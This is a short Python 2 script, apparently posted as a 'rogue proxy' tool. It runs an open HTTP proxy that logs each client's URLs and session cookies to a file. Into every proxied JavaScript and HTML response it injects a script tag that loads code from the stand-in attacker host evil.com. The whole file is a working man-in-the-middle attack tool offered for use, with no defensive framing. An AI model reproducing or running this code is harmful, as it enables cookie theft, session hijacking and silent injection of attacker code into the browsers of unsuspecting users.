Fourth Joker Card Rogue Proxy coded By Milenko/SynthMesc

1. injectJS = "\r\n(function(){'use strict';(function(d,script){script=d.createElement('script');script.type='text/javascript';script.async=true;script.onload=function(){};script.src='http://evil.com/campaign.js';d.getElementsByTagName('head')[0].appendChild(script)}(document))})();\r\n"
2. injectHTML = "<html><script type='text/JavaScript'>" + injectJS + "</script></html>"
3.  
4. blackList = ["http://evil.com/campaign.js"]
5.  
6. '''
7. CONNECT www.google.com:443 HTTP/1.1
8. Host: www.google.com:443
9. Proxy-Connection: keep-alive
10. User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Safari/537.36
11. '''
12.  
13. import socket
14. import urllib2
15. from threading import Thread
16.  
17. def Server():
18.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
19.     print "[.] Binding to 0.0.0.0:8080..."
20.     try:
21.         s.bind(("", 8080))
22.     except:
23.         print "[-] Unable to bind to port 8080!"
24.         return
25.     s.listen(100000)
26.     fh = open("/sdcard/ProxyRequests.log", "a")
27.     logdata = "[+] Fourth Joker Card Proxy started!"
28.     print logdata
29.     fh.write(logdata + "\r\n")
30.     while True:
31.         (c, addr) = s.accept()
32.         print "[+] " + addr[0] + ":" + str(addr[1]) + " connected!"
33.         try:
34.             Thread(target=Handler, args=(c, addr, fh)).start()
35.         except:
36.             try:
37.                 c.close()
38.             except:
39.                 pass
40.             pass
41.  
42. def Handler(c, addr, fh):
43.     try:
44.         req = c.recv(8192)
45.         req = req.split("\r\n")
46.         url = req[0].split(" ")[1]
47.         Cookie = ""
48.         opener = urllib2.build_opener()
49.         for i in xrange(0, len(req) - 1):
50.             if req[i].startswith("User-Agent: "):
51.                 UserAgent = " ".join(req[3].split(" ")[1:])
52.                 opener.addheaders = [('User-Agent', UserAgent)]
53.             if req[i].startswith("Cookie: "):
54.                 Cookie =  " ".join(req[6].split(" ")[1:])
55.                 opener.addheaders = [('Cookie', Cookie)]
56.     except Exception, e:
57.         try:
58.             c.send("<b>Sorry, we have encountered an error processing your request: <i>" + str(e) + "</i></b>")
59.         except:
60.             pass
61.         print "[-] Error processing request: " + str(e)
62.         return
63.     try:
64.         responce = opener.open(url).read()
65.         logdata = "[+] " + addr[0] + ":" + str(addr[1]) + " requests " + url
66.         if Cookie != "":
67.             logdata += " with cookie: " + Cookie
68.         print logdata
69.         fh.write(logdata + "\r\n")
70.         if url.endswith('js'): #inject into all javascript files
71.             logdata = "[+] " + addr[0] + ":" + str(addr[1]) + " requested JS file! Injecting..."
72.             print logdata
73.             fh.write(logdata + "\r\n")
74.             if url in blackList:
75.                 c.send(responce)
76.             else:
77.                 c.send(responce + "\r\n" + injectJS)
78.         elif url.endswith("html") or url.endswith("php") or url.endswith("/"):
79.             print "[+] " + addr[0] + ":" + str(addr[1]) + " requested HTML file! Injecting..."
80.             logdata = "[+] " + addr[0] + ":" + str(addr[1]) + " requested HTML file! Injecting..."
81.             print logdata
82.             fh.write(logdata + "\r\n")
83.             if url in blackList:
84.                 c.send(responce)
85.             else:
86.                 c.send(responce + "\r\n" + injectHTML)
87.         else:
88.             c.send(responce)
89.     except Exception, e:
90.         try:
91.             c.send("<b>Proxy Error: <i>" + str(e) + "</i></b>")
92.         except:
93.             pass
94.     try:
95.         c.close()
96.     except:
97.         pass
98.  
99. if __name__=="__main__":
100.     Server()